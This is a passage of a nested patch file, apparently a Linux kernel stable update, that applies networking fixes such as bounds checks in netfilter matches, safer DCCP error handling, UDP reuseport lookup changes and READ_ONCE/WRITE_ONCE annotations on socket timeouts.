+ 	if (unlikely(err))
+-		return err;
++		return net_xmit_errno(err);
+ 
+ 	/* ip[6]_finish_output2 understand LWTUNNEL_XMIT_DONE */
+ 	return LWTUNNEL_XMIT_DONE;
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index b6c16db86c719..24bf4aa222d27 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -4135,21 +4135,20 @@ struct sk_buff *skb_segment(struct sk_buff *head_skb,
+ 	struct sk_buff *segs = NULL;
+ 	struct sk_buff *tail = NULL;
+ 	struct sk_buff *list_skb = skb_shinfo(head_skb)->frag_list;
+-	skb_frag_t *frag = skb_shinfo(head_skb)->frags;
+ 	unsigned int mss = skb_shinfo(head_skb)->gso_size;
+ 	unsigned int doffset = head_skb->data - skb_mac_header(head_skb);
+-	struct sk_buff *frag_skb = head_skb;
+ 	unsigned int offset = doffset;
+ 	unsigned int tnl_hlen = skb_tnl_header_len(head_skb);
+ 	unsigned int partial_segs = 0;
+ 	unsigned int headroom;
+ 	unsigned int len = head_skb->len;
++	struct sk_buff *frag_skb;
++	skb_frag_t *frag;
+ 	__be16 proto;
+ 	bool csum, sg;
+-	int nfrags = skb_shinfo(head_skb)->nr_frags;
+ 	int err = -ENOMEM;
+ 	int i = 0;
+-	int pos;
++	int nfrags, pos;
+ 
+ 	if ((skb_shinfo(head_skb)->gso_type & SKB_GSO_DODGY) &&
+ 	    mss != GSO_BY_FRAGS && mss != skb_headlen(head_skb)) {
+@@ -4226,6 +4225,13 @@ normal:
+ 	headroom = skb_headroom(head_skb);
+ 	pos = skb_headlen(head_skb);
+ 
++	if (skb_orphan_frags(head_skb, GFP_ATOMIC))
++		return ERR_PTR(-ENOMEM);
++
++	nfrags = skb_shinfo(head_skb)->nr_frags;
++	frag = skb_shinfo(head_skb)->frags;
++	frag_skb = head_skb;
++
+ 	do {
+ 		struct sk_buff *nskb;
+ 		skb_frag_t *nskb_frag;
+@@ -4246,6 +4252,10 @@ normal:
+ 		    (skb_headlen(list_skb) == len || sg)) {
+ 			BUG_ON(skb_headlen(list_skb) > len);
+ 
++			nskb = skb_clone(list_skb, GFP_ATOMIC);
++			if (unlikely(!nskb))
++				goto err;
++
+ 			i = 0;
+ 			nfrags = skb_shinfo(list_skb)->nr_frags;
+ 			frag = skb_shinfo(list_skb)->frags;
+@@ -4264,12 +4274,8 @@ normal:
+ 				frag++;
+ 			}
+ 
+-			nskb = skb_clone(list_skb, GFP_ATOMIC);
+ 			list_skb = list_skb->next;
+ 
+-			if (unlikely(!nskb))
+-				goto err;
+-
+ 			if (unlikely(pskb_trim(nskb, len))) {
+ 				kfree_skb(nskb);
+ 				goto err;
+@@ -4345,12 +4351,16 @@ normal:
+ 		skb_shinfo(nskb)->flags |= skb_shinfo(head_skb)->flags &
+ 					   SKBFL_SHARED_FRAG;
+ 
+-		if (skb_orphan_frags(frag_skb, GFP_ATOMIC) ||
+-		    skb_zerocopy_clone(nskb, frag_skb, GFP_ATOMIC))
++		if (skb_zerocopy_clone(nskb, frag_skb, GFP_ATOMIC))
+ 			goto err;
+ 
+ 		while (pos < offset + len) {
+ 			if (i >= nfrags) {
++				if (skb_orphan_frags(list_skb, GFP_ATOMIC) ||
++				    skb_zerocopy_clone(nskb, list_skb,
++						       GFP_ATOMIC))
++					goto err;
++
+ 				i = 0;
+ 				nfrags = skb_shinfo(list_skb)->nr_frags;
+ 				frag = skb_shinfo(list_skb)->frags;
+@@ -4364,10 +4374,6 @@ normal:
+ 					i--;
+ 					frag--;
+ 				}
+-				if (skb_orphan_frags(frag_skb, GFP_ATOMIC) ||
+-				    skb_zerocopy_clone(nskb, frag_skb,
+-						       GFP_ATOMIC))
+-					goto err;
+ 
+ 				list_skb = list_skb->next;
+ 			}
+diff --git a/net/core/sock.c b/net/core/sock.c
+index 509773919d302..fc475845c94d5 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -425,6 +425,7 @@ static int sock_set_timeout(long *timeo_p, sockptr_t optval, int optlen,
+ {
+ 	struct __kernel_sock_timeval tv;
+ 	int err = sock_copy_user_timeval(&tv, optval, optlen, old_timeval);
++	long val;
+ 
+ 	if (err)
+ 		return err;
+@@ -435,7 +436,7 @@ static int sock_set_timeout(long *timeo_p, sockptr_t optval, int optlen,
+ 	if (tv.tv_sec < 0) {
+ 		static int warned __read_mostly;
+ 
+-		*timeo_p = 0;
++		WRITE_ONCE(*timeo_p, 0);
+ 		if (warned < 10 && net_ratelimit()) {
+ 			warned++;
+ 			pr_info("%s: `%s' (pid %d) tries to set negative timeout\n",
+@@ -443,11 +444,12 @@ static int sock_set_timeout(long *timeo_p, sockptr_t optval, int optlen,
+ 		}
+ 		return 0;
+ 	}
+-	*timeo_p = MAX_SCHEDULE_TIMEOUT;
+-	if (tv.tv_sec == 0 && tv.tv_usec == 0)
+-		return 0;
+-	if (tv.tv_sec < (MAX_SCHEDULE_TIMEOUT / HZ - 1))
+-		*timeo_p = tv.tv_sec * HZ + DIV_ROUND_UP((unsigned long)tv.tv_usec, USEC_PER_SEC / HZ);
++	val = MAX_SCHEDULE_TIMEOUT;
++	if ((tv.tv_sec || tv.tv_usec) &&
++	    (tv.tv_sec < (MAX_SCHEDULE_TIMEOUT / HZ - 1)))
++		val = tv.tv_sec * HZ + DIV_ROUND_UP((unsigned long)tv.tv_usec,
++						    USEC_PER_SEC / HZ);
++	WRITE_ONCE(*timeo_p, val);
+ 	return 0;
+ }
+ 
+@@ -791,7 +793,7 @@ EXPORT_SYMBOL(sock_set_reuseport);
+ void sock_no_linger(struct sock *sk)
+ {
+ 	lock_sock(sk);
+-	sk->sk_lingertime = 0;
++	WRITE_ONCE(sk->sk_lingertime, 0);
+ 	sock_set_flag(sk, SOCK_LINGER);
+ 	release_sock(sk);
+ }
+@@ -809,9 +811,9 @@ void sock_set_sndtimeo(struct sock *sk, s64 secs)
+ {
+ 	lock_sock(sk);
+ 	if (secs && secs < MAX_SCHEDULE_TIMEOUT / HZ - 1)
+-		sk->sk_sndtimeo = secs * HZ;
++		WRITE_ONCE(sk->sk_sndtimeo, secs * HZ);
+ 	else
+-		sk->sk_sndtimeo = MAX_SCHEDULE_TIMEOUT;
++		WRITE_ONCE(sk->sk_sndtimeo, MAX_SCHEDULE_TIMEOUT);
+ 	release_sock(sk);
+ }
+ EXPORT_SYMBOL(sock_set_sndtimeo);
+@@ -1217,15 +1219,15 @@ set_sndbuf:
+ 			ret = -EFAULT;
+ 			break;
+ 		}
+-		if (!ling.l_onoff)
++		if (!ling.l_onoff) {
+ 			sock_reset_flag(sk, SOCK_LINGER);
+-		else {
+-#if (BITS_PER_LONG == 32)
+-			if ((unsigned int)ling.l_linger >= MAX_SCHEDULE_TIMEOUT/HZ)
+-				sk->sk_lingertime = MAX_SCHEDULE_TIMEOUT;
++		} else {
++			unsigned long t_sec = ling.l_linger;
++
++			if (t_sec >= MAX_SCHEDULE_TIMEOUT / HZ)
++				WRITE_ONCE(sk->sk_lingertime, MAX_SCHEDULE_TIMEOUT);
+ 			else
+-#endif
+-				sk->sk_lingertime = (unsigned int)ling.l_linger * HZ;
++				WRITE_ONCE(sk->sk_lingertime, t_sec * HZ);
+ 			sock_set_flag(sk, SOCK_LINGER);
+ 		}
+ 		break;
+@@ -1676,7 +1678,7 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 	case SO_LINGER:
+ 		lv		= sizeof(v.ling);
+ 		v.ling.l_onoff	= sock_flag(sk, SOCK_LINGER);
+-		v.ling.l_linger	= sk->sk_lingertime / HZ;
++		v.ling.l_linger	= READ_ONCE(sk->sk_lingertime) / HZ;
+ 		break;
+ 
+ 	case SO_BSDCOMPAT:
+@@ -1708,12 +1710,14 @@ int sk_getsockopt(struct sock *sk, int level, int optname,
+ 
+ 	case SO_RCVTIMEO_OLD:
+ 	case SO_RCVTIMEO_NEW:
+-		lv = sock_get_timeout(sk->sk_rcvtimeo, &v, SO_RCVTIMEO_OLD == optname);
++		lv = sock_get_timeout(READ_ONCE(sk->sk_rcvtimeo), &v,
++				      SO_RCVTIMEO_OLD == optname);
+ 		break;
+ 
+ 	case SO_SNDTIMEO_OLD:
+ 	case SO_SNDTIMEO_NEW:
+-		lv = sock_get_timeout(sk->sk_sndtimeo, &v, SO_SNDTIMEO_OLD == optname);
++		lv = sock_get_timeout(READ_ONCE(sk->sk_sndtimeo), &v,
++				      SO_SNDTIMEO_OLD == optname);
+ 		break;
+ 
+ 	case SO_RCVLOWAT:
+diff --git a/net/dccp/ipv4.c b/net/dccp/ipv4.c
+index bfececa9e244e..8f5d3c0881118 100644
+--- a/net/dccp/ipv4.c
++++ b/net/dccp/ipv4.c
+@@ -255,12 +255,17 @@ static int dccp_v4_err(struct sk_buff *skb, u32 info)
+ 	int err;
+ 	struct net *net = dev_net(skb->dev);
+ 
+-	/* Only need dccph_dport & dccph_sport which are the first
+-	 * 4 bytes in dccp header.
++	/* For the first __dccp_basic_hdr_len() check, we only need dh->dccph_x,
++	 * which is in byte 7 of the dccp header.
+ 	 * Our caller (icmp_socket_deliver()) already pulled 8 bytes for us.
++	 *
++	 * Later on, we want to access the sequence number fields, which are
++	 * beyond 8 bytes, so we have to pskb_may_pull() ourselves.
+ 	 */
+-	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8);
+-	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8);
++	dh = (struct dccp_hdr *)(skb->data + offset);
++	if (!pskb_may_pull(skb, offset + __dccp_basic_hdr_len(dh)))
++		return -EINVAL;
++	iph = (struct iphdr *)skb->data;
+ 	dh = (struct dccp_hdr *)(skb->data + offset);
+ 
+ 	sk = __inet_lookup_established(net, &dccp_hashinfo,
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index b51ce6f8ceba0..2b09e2644b13f 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -74,7 +74,7 @@ static inline __u64 dccp_v6_init_sequence(struct sk_buff *skb)
+ static int dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 			u8 type, u8 code, int offset, __be32 info)
+ {
+-	const struct ipv6hdr *hdr = (const struct ipv6hdr *)skb->data;
++	const struct ipv6hdr *hdr;
+ 	const struct dccp_hdr *dh;
+ 	struct dccp_sock *dp;
+ 	struct ipv6_pinfo *np;
+@@ -83,12 +83,17 @@ static int dccp_v6_err(struct sk_buff *skb, struct inet6_skb_parm *opt,
+ 	__u64 seq;
+ 	struct net *net = dev_net(skb->dev);
+ 
+-	/* Only need dccph_dport & dccph_sport which are the first
+-	 * 4 bytes in dccp header.
++	/* For the first __dccp_basic_hdr_len() check, we only need dh->dccph_x,
++	 * which is in byte 7 of the dccp header.
+ 	 * Our caller (icmpv6_notify()) already pulled 8 bytes for us.
++	 *
++	 * Later on, we want to access the sequence number fields, which are
++	 * beyond 8 bytes, so we have to pskb_may_pull() ourselves.
+ 	 */
+-	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_sport) > 8);
+-	BUILD_BUG_ON(offsetofend(struct dccp_hdr, dccph_dport) > 8);
++	dh = (struct dccp_hdr *)(skb->data + offset);
++	if (!pskb_may_pull(skb, offset + __dccp_basic_hdr_len(dh)))
++		return -EINVAL;
++	hdr = (const struct ipv6hdr *)skb->data;
+ 	dh = (struct dccp_hdr *)(skb->data + offset);
+ 
+ 	sk = __inet6_lookup_established(net, &dccp_hashinfo,
+diff --git a/net/ipv4/igmp.c b/net/ipv4/igmp.c
+index 81be3e0f0e704..cbc4816ed7d83 100644
+--- a/net/ipv4/igmp.c
++++ b/net/ipv4/igmp.c
+@@ -353,8 +353,9 @@ static struct sk_buff *igmpv3_newpack(struct net_device *dev, unsigned int mtu)
+ 	struct flowi4 fl4;
+ 	int hlen = LL_RESERVED_SPACE(dev);
+ 	int tlen = dev->needed_tailroom;
+-	unsigned int size = mtu;
++	unsigned int size;
+ 
++	size = min(mtu, IP_MAX_MTU);
+ 	while (1) {
+ 		skb = alloc_skb(size + hlen + tlen,
+ 				GFP_ATOMIC | __GFP_NOWARN);
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index acfe58d2f1dd7..ebd2cea5b7d7a 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -214,7 +214,7 @@ static int ip_finish_output2(struct net *net, struct sock *sk, struct sk_buff *s
+ 	if (lwtunnel_xmit_redirect(dst->lwtstate)) {
+ 		int res = lwtunnel_xmit(skb);
+ 
+-		if (res < 0 || res == LWTUNNEL_XMIT_DONE)
++		if (res != LWTUNNEL_XMIT_CONTINUE)
+ 			return res;
+ 	}
+ 
+diff --git a/net/ipv4/tcp_input.c b/net/ipv4/tcp_input.c
+index e2d3ea2e34561..c697836f2b5b4 100644
+--- a/net/ipv4/tcp_input.c
++++ b/net/ipv4/tcp_input.c
+@@ -287,7 +287,7 @@ static void tcp_incr_quickack(struct sock *sk, unsigned int max_quickacks)
+ 		icsk->icsk_ack.quick = quickacks;
+ }
+ 
+-void tcp_enter_quickack_mode(struct sock *sk, unsigned int max_quickacks)
++static void tcp_enter_quickack_mode(struct sock *sk, unsigned int max_quickacks)
+ {
+ 	struct inet_connection_sock *icsk = inet_csk(sk);
+ 
+@@ -295,7 +295,6 @@ void tcp_enter_quickack_mode(struct sock *sk, unsigned int max_quickacks)
+ 	inet_csk_exit_pingpong_mode(sk);
+ 	icsk->icsk_ack.ato = TCP_ATO_MIN;
+ }
+-EXPORT_SYMBOL(tcp_enter_quickack_mode);
+ 
+ /* Send ACKs quickly, if "quick" count is not exhausted
+  * and the session is not interactive.
+diff --git a/net/ipv4/tcp_timer.c b/net/ipv4/tcp_timer.c
+index cf354c29ec123..44b49f7d1a9e6 100644
+--- a/net/ipv4/tcp_timer.c
++++ b/net/ipv4/tcp_timer.c
+@@ -441,6 +441,22 @@ static void tcp_fastopen_synack_timer(struct sock *sk, struct request_sock *req)
+ 			  req->timeout << req->num_timeout, TCP_RTO_MAX);
+ }
+ 
++static bool tcp_rtx_probe0_timed_out(const struct sock *sk,
++				     const struct sk_buff *skb)
++{
++	const struct tcp_sock *tp = tcp_sk(sk);
++	const int timeout = TCP_RTO_MAX * 2;
++	u32 rcv_delta, rtx_delta;
++
++	rcv_delta = inet_csk(sk)->icsk_timeout - tp->rcv_tstamp;
++	if (rcv_delta <= timeout)
++		return false;
++
++	rtx_delta = (u32)msecs_to_jiffies(tcp_time_stamp(tp) -
++			(tp->retrans_stamp ?: tcp_skb_timestamp(skb)));
++
++	return rtx_delta > timeout;
++}
+ 
+ /**
+  *  tcp_retransmit_timer() - The TCP retransmit timeout handler
+@@ -506,7 +522,7 @@ void tcp_retransmit_timer(struct sock *sk)
+ 					    tp->snd_una, tp->snd_nxt);
+ 		}
+ #endif
+-		if (tcp_jiffies32 - tp->rcv_tstamp > TCP_RTO_MAX) {
++		if (tcp_rtx_probe0_timed_out(sk, skb)) {
+ 			tcp_write_err(sk);
+ 			goto out;
+ 		}
+diff --git a/net/ipv4/udp.c b/net/ipv4/udp.c
+index 956d6797c76f3..42c1f7d9a980a 100644
+--- a/net/ipv4/udp.c
++++ b/net/ipv4/udp.c
+@@ -445,14 +445,24 @@ static struct sock *udp4_lib_lookup2(struct net *net,
+ 		score = compute_score(sk, net, saddr, sport,
+ 				      daddr, hnum, dif, sdif);
+ 		if (score > badness) {
+-			result = lookup_reuseport(net, sk, skb,
+-						  saddr, sport, daddr, hnum);
++			badness = score;
++			result = lookup_reuseport(net, sk, skb, saddr, sport, daddr, hnum);
++			if (!result) {
++				result = sk;
++				continue;
++			}
++
+ 			/* Fall back to scoring if group has connections */
+-			if (result && !reuseport_has_conns(sk))
++			if (!reuseport_has_conns(sk))
+ 				return result;
+ 
+-			result = result ? : sk;
+-			badness = score;
++			/* Reuseport logic returned an error, keep original score. */
++			if (IS_ERR(result))
++				continue;
++
++			badness = compute_score(result, net, saddr, sport,
++						daddr, hnum, dif, sdif);
++
+ 		}
+ 	}
+ 	return result;
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index 95a55c6630add..34192f7a166fb 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -112,7 +112,7 @@ static int ip6_finish_output2(struct net *net, struct sock *sk, struct sk_buff *
+ 	if (lwtunnel_xmit_redirect(dst->lwtstate)) {
+ 		int res = lwtunnel_xmit(skb);
+ 
+-		if (res < 0 || res == LWTUNNEL_XMIT_DONE)
++		if (res != LWTUNNEL_XMIT_CONTINUE)
+ 			return res;
+ 	}
+ 
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 27348172b25b9..64b36c2ba774a 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -193,14 +193,23 @@ static struct sock *udp6_lib_lookup2(struct net *net,
+ 		score = compute_score(sk, net, saddr, sport,
+ 				      daddr, hnum, dif, sdif);
+ 		if (score > badness) {
+-			result = lookup_reuseport(net, sk, skb,
+-						  saddr, sport, daddr, hnum);
++			badness = score;
++			result = lookup_reuseport(net, sk, skb, saddr, sport, daddr, hnum);
++			if (!result) {
++				result = sk;
++				continue;
++			}
++
+ 			/* Fall back to scoring if group has connections */
+-			if (result && !reuseport_has_conns(sk))
++			if (!reuseport_has_conns(sk))
+ 				return result;
+ 
+-			result = result ? : sk;
+-			badness = score;
++			/* Reuseport logic returned an error, keep original score. */
++			if (IS_ERR(result))
++				continue;
++
++			badness = compute_score(sk, net, saddr, sport,
++						daddr, hnum, dif, sdif);
+ 		}
+ 	}
+ 	return result;
+diff --git a/net/mac80211/tx.c b/net/mac80211/tx.c
+index 763cefd0cc268..2f9e1abdf375d 100644
+--- a/net/mac80211/tx.c
++++ b/net/mac80211/tx.c
+@@ -4391,7 +4391,7 @@ static void ieee80211_mlo_multicast_tx(struct net_device *dev,
+ 				       struct sk_buff *skb)
+ {
+ 	struct ieee80211_sub_if_data *sdata = IEEE80211_DEV_TO_SUB_IF(dev);
+-	unsigned long links = sdata->vif.valid_links;
++	unsigned long links = sdata->vif.active_links;
+ 	unsigned int link;
+ 	u32 ctrl_flags = IEEE80211_TX_CTRL_MCAST_MLO_FIRST_TX;
+ 
+@@ -5827,7 +5827,7 @@ void __ieee80211_tx_skb_tid_band(struct ieee80211_sub_if_data *sdata,
+ 		rcu_read_unlock();
+ 
+ 		if (WARN_ON_ONCE(link == ARRAY_SIZE(sdata->vif.link_conf)))
+-			link = ffs(sdata->vif.valid_links) - 1;
++			link = ffs(sdata->vif.active_links) - 1;
+ 	}
+ 
+ 	IEEE80211_SKB_CB(skb)->control.flags |=
+@@ -5863,7 +5863,7 @@ void ieee80211_tx_skb_tid(struct ieee80211_sub_if_data *sdata,
+ 		band = chanctx_conf->def.chan->band;
+ 	} else {
+ 		WARN_ON(link_id >= 0 &&
+-			!(sdata->vif.valid_links & BIT(link_id)));
++			!(sdata->vif.active_links & BIT(link_id)));
+ 		/* MLD transmissions must not rely on the band */
+ 		band = 0;
+ 	}
+diff --git a/net/netfilter/ipset/ip_set_hash_netportnet.c b/net/netfilter/ipset/ip_set_hash_netportnet.c
+index 005a7ce87217e..bf4f91b78e1dc 100644
+--- a/net/netfilter/ipset/ip_set_hash_netportnet.c
++++ b/net/netfilter/ipset/ip_set_hash_netportnet.c
+@@ -36,6 +36,7 @@ MODULE_ALIAS("ip_set_hash:net,port,net");
+ #define IP_SET_HASH_WITH_PROTO
+ #define IP_SET_HASH_WITH_NETS
+ #define IPSET_NET_COUNT 2
++#define IP_SET_HASH_WITH_NET0
+ 
+ /* IPv4 variant */
+ 
+diff --git a/net/netfilter/nft_exthdr.c b/net/netfilter/nft_exthdr.c
+index a67ea9c3ae57d..c307c57a93e57 100644
+--- a/net/netfilter/nft_exthdr.c
++++ b/net/netfilter/nft_exthdr.c
+@@ -238,7 +238,12 @@ static void nft_exthdr_tcp_set_eval(const struct nft_expr *expr,
+ 	if (!tcph)
+ 		goto err;
+ 
++	if (skb_ensure_writable(pkt->skb, nft_thoff(pkt) + tcphdr_len))
++		goto err;
++
++	tcph = (struct tcphdr *)(pkt->skb->data + nft_thoff(pkt));
+ 	opt = (u8 *)tcph;
++
+ 	for (i = sizeof(*tcph); i < tcphdr_len - 1; i += optl) {
+ 		union {
+ 			__be16 v16;
+@@ -253,15 +258,6 @@ static void nft_exthdr_tcp_set_eval(const struct nft_expr *expr,
+ 		if (i + optl > tcphdr_len || priv->len + priv->offset > optl)
+ 			goto err;
+ 
+-		if (skb_ensure_writable(pkt->skb,
+-					nft_thoff(pkt) + i + priv->len))
+-			goto err;
+-
+-		tcph = nft_tcp_header_pointer(pkt, sizeof(buff), buff,
+-					      &tcphdr_len);
+-		if (!tcph)
+-			goto err;
+-
+ 		offset = i + priv->offset;
+ 
+ 		switch (priv->len) {
+@@ -325,9 +321,9 @@ static void nft_exthdr_tcp_strip_eval(const struct nft_expr *expr,
+ 	if (skb_ensure_writable(pkt->skb, nft_thoff(pkt) + tcphdr_len))
+ 		goto drop;
+ 
+-	opt = (u8 *)nft_tcp_header_pointer(pkt, sizeof(buff), buff, &tcphdr_len);
+-	if (!opt)
+-		goto err;
++	tcph = (struct tcphdr *)(pkt->skb->data + nft_thoff(pkt));
++	opt = (u8 *)tcph;
++
+ 	for (i = sizeof(*tcph); i < tcphdr_len - 1; i += optl) {
+ 		unsigned int j;
+ 
+diff --git a/net/netfilter/xt_sctp.c b/net/netfilter/xt_sctp.c
+index 680015ba7cb6e..d4bf089c9e3f9 100644
+--- a/net/netfilter/xt_sctp.c
++++ b/net/netfilter/xt_sctp.c
+@@ -150,6 +150,8 @@ static int sctp_mt_check(const struct xt_mtchk_param *par)
+ {
+ 	const struct xt_sctp_info *info = par->matchinfo;
+ 
++	if (info->flag_count > ARRAY_SIZE(info->flag_info))
++		return -EINVAL;
+ 	if (info->flags & ~XT_SCTP_VALID_FLAGS)
+ 		return -EINVAL;
+ 	if (info->invflags & ~XT_SCTP_VALID_FLAGS)
+diff --git a/net/netfilter/xt_u32.c b/net/netfilter/xt_u32.c
+index 177b40d08098b..117d4615d6684 100644
+--- a/net/netfilter/xt_u32.c
++++ b/net/netfilter/xt_u32.c
+@@ -96,11 +96,32 @@ static bool u32_mt(const struct sk_buff *skb, struct xt_action_param *par)
+ 	return ret ^ data->invert;
+ }
+ 
++static int u32_mt_checkentry(const struct xt_mtchk_param *par)
++{
++	const struct xt_u32 *data = par->matchinfo;
++	const struct xt_u32_test *ct;
++	unsigned int i;
++
++	if (data->ntests > ARRAY_SIZE(data->tests))
++		return -EINVAL;
++
++	for (i = 0; i < data->ntests; ++i) {
++		ct = &data->tests[i];
++
++		if (ct->nnums > ARRAY_SIZE(ct->location) ||
++		    ct->nvalues > ARRAY_SIZE(ct->value))
++			return -EINVAL;
++	}
++
++	return 0;
++}
++
+ static struct xt_match xt_u32_mt_reg __read_mostly = {
+ 	.name       = "u32",
+ 	.revision   = 0,
+ 	.family     = NFPROTO_UNSPEC,
+ 	.match      = u32_mt,
++	.checkentry = u32_mt_checkentry,
+ 	.matchsize  = sizeof(struct xt_u32),
+ 	.me         = THIS_MODULE,
+ };
+diff --git a/net/netlabel/netlabel_kapi.c b/net/netlabel/netlabel_kapi.c
+index 54c0830039470..27511c90a26f4 100644
+--- a/net/netlabel/netlabel_kapi.c
++++ b/net/netlabel/netlabel_kapi.c
+@@ -857,7 +857,8 @@ int netlbl_catmap_setlong(struct netlbl_lsm_catmap **catmap,
+ 
+ 	offset -= iter->startbit;
+ 	idx = offset / NETLBL_CATMAP_MAPSIZE;
+-	iter->bitmap[idx] |= bitmap << (offset % NETLBL_CATMAP_MAPSIZE);
++	iter->bitmap[idx] |= (NETLBL_CATMAP_MAPTYPE)bitmap
++			     << (offset % NETLBL_CATMAP_MAPSIZE);
+ 
+ 	return 0;
+ }
+diff --git a/net/netrom/af_netrom.c b/net/netrom/af_netrom.c
+index 5a4cb796150f5..ec5747969f964 100644
+--- a/net/netrom/af_netrom.c
++++ b/net/netrom/af_netrom.c
+@@ -660,6 +660,11 @@ static int nr_connect(struct socket *sock, struct sockaddr *uaddr,
+ 		goto out_release;
+ 	}
+ 
++	if (sock->state == SS_CONNECTING) {
++		err = -EALREADY;
++		goto out_release;
++	}
++
+ 	sk->sk_state   = TCP_CLOSE;
+ 	sock->state = SS_UNCONNECTED;
+ 
+diff --git a/net/sched/em_meta.c b/net/sched/em_meta.c
+index 49bae3d5006b0..6f2f135aab676 100644
+--- a/net/sched/em_meta.c
++++ b/net/sched/em_meta.c
+@@ -502,7 +502,7 @@ META_COLLECTOR(int_sk_lingertime)
+ 		*err = -1;
+ 		return;
+ 	}
+-	dst->value = sk->sk_lingertime / HZ;
++	dst->value = READ_ONCE(sk->sk_lingertime) / HZ;
+ }
+ 
+ META_COLLECTOR(int_sk_err_qlen)
+@@ -568,7 +568,7 @@ META_COLLECTOR(int_sk_rcvtimeo)
+ 		*err = -1;
+ 		return;
+ 	}
+-	dst->value = sk->sk_rcvtimeo / HZ;
++	dst->value = READ_ONCE(sk->sk_rcvtimeo) / HZ;
+ }
+ 
+ META_COLLECTOR(int_sk_sndtimeo)
+@@ -579,7 +579,7 @@ META_COLLECTOR(int_sk_sndtimeo)
+ 		*err = -1;
+ 		return;
+ 	}
+-	dst->value = sk->sk_sndtimeo / HZ;
++	dst->value = READ_ONCE(sk->sk_sndtimeo) / HZ;
+ }
+ 
+ META_COLLECTOR(int_sk_sendmsg_off)
+diff --git a/net/sched/sch_hfsc.c b/net/sched/sch_hfsc.c
+index 70b0c5873d326..61d52594ff6d8 100644
+--- a/net/sched/sch_hfsc.c
++++ b/net/sched/sch_hfsc.c
+@@ -1012,6 +1012,10 @@ hfsc_change_class(struct Qdisc *sch, u32 classid, u32 parentid,
+ 		if (parent == NULL)
+ 			return -ENOENT;
+ 	}
++	if (!(parent->cl_flags & HFSC_FSC) && parent != &q->root) {
++		NL_SET_ERR_MSG(extack, "Invalid parent - parent class must have FSC");
++		return -EINVAL;
++	}
+ 
+ 	if (classid == 0 || TC_H_MAJ(classid ^ sch->handle) != 0)
+ 		return -EINVAL;
+diff --git a/net/sctp/sm_sideeffect.c b/net/sctp/sm_sideeffect.c
+index 463c4a58d2c36..970c6a486a9b0 100644
+--- a/net/sctp/sm_sideeffect.c
++++ b/net/sctp/sm_sideeffect.c
+@@ -1251,7 +1251,10 @@ static int sctp_side_effects(enum sctp_event_type event_type,
+ 	default:
+ 		pr_err("impossible disposition %d in state %d, event_type %d, event_id %d\n",
+ 		       status, state, event_type, subtype.chunk);
+-		BUG();
++		error = status;
++		if (error >= 0)
++			error = -EINVAL;
++		WARN_ON_ONCE(1);
+ 		break;
+ 	}
+ 
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index 84219c5121bc2..f774d840759d6 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -1807,7 +1807,7 @@ void smc_close_non_accepted(struct sock *sk)
+ 	lock_sock(sk);
+ 	if (!sk->sk_lingertime)
+ 		/* wait for peer closing */
+-		sk->sk_lingertime = SMC_MAX_STREAM_WAIT_TIMEOUT;
++		WRITE_ONCE(sk->sk_lingertime, SMC_MAX_STREAM_WAIT_TIMEOUT);
+ 	__smc_release(smc);
+ 	release_sock(sk);
+ 	sock_put(sk); /* sock_hold above */
+diff --git a/net/socket.c b/net/socket.c
+index c2e0a22f16d9b..d281a7ef4b1d3 100644
+--- a/net/socket.c
++++ b/net/socket.c
+@@ -3507,7 +3507,11 @@ EXPORT_SYMBOL(kernel_accept);
+ int kernel_connect(struct socket *sock, struct sockaddr *addr, int addrlen,
+ 		   int flags)
+ {
+-	return sock->ops->connect(sock, addr, addrlen, flags);
++	struct sockaddr_storage address;
++
++	memcpy(&address, addr, addrlen);
++
++	return sock->ops->connect(sock, (struct sockaddr *)&address, addrlen, flags);
+ }
+ EXPORT_SYMBOL(kernel_connect);
+ 
+diff --git a/net/wireless/nl80211.c b/net/wireless/nl80211.c
+index c2363d44a1ffc..12c7c89d5be1d 100644
+--- a/net/wireless/nl80211.c
++++ b/net/wireless/nl80211.c
+@@ -323,6 +323,7 @@ nl80211_pmsr_ftm_req_attr_policy[NL80211_PMSR_FTM_REQ_ATTR_MAX + 1] = {
+ 	[NL80211_PMSR_FTM_REQ_ATTR_TRIGGER_BASED] = { .type = NLA_FLAG },
+ 	[NL80211_PMSR_FTM_REQ_ATTR_NON_TRIGGER_BASED] = { .type = NLA_FLAG },
+ 	[NL80211_PMSR_FTM_REQ_ATTR_LMR_FEEDBACK] = { .type = NLA_FLAG },
++	[NL80211_PMSR_FTM_REQ_ATTR_BSS_COLOR] = { .type = NLA_U8 },
+ };
+ 
+ static const struct nla_policy
+diff --git a/net/wireless/util.c b/net/wireless/util.c
+index 39680e7bad45a..f433f3fdd9e94 100644
+--- a/net/wireless/util.c
++++ b/net/wireless/util.c
+@@ -5,7 +5,7 @@
+  * Copyright 2007-2009	Johannes Berg <johannes@sipsolutions.net>
+  * Copyright 2013-2014  Intel Mobile Communications GmbH
+  * Copyright 2017	Intel Deutschland GmbH
+- * Copyright (C) 2018-2022 Intel Corporation
++ * Copyright (C) 2018-2023 Intel Corporation
+  */
+ #include <linux/export.h>
+ #include <linux/bitops.h>
+@@ -2479,6 +2479,13 @@ void cfg80211_remove_links(struct wireless_dev *wdev)
+ {
+ 	unsigned int link_id;
+ 
++	/*
++	 * links are controlled by upper layers (userspace/cfg)
++	 * only for AP mode, so only remove them here for AP
++	 */
++	if (wdev->iftype != NL80211_IFTYPE_AP)
++		return;
++
+ 	wdev_lock(wdev);
+ 	if (wdev->valid_links) {
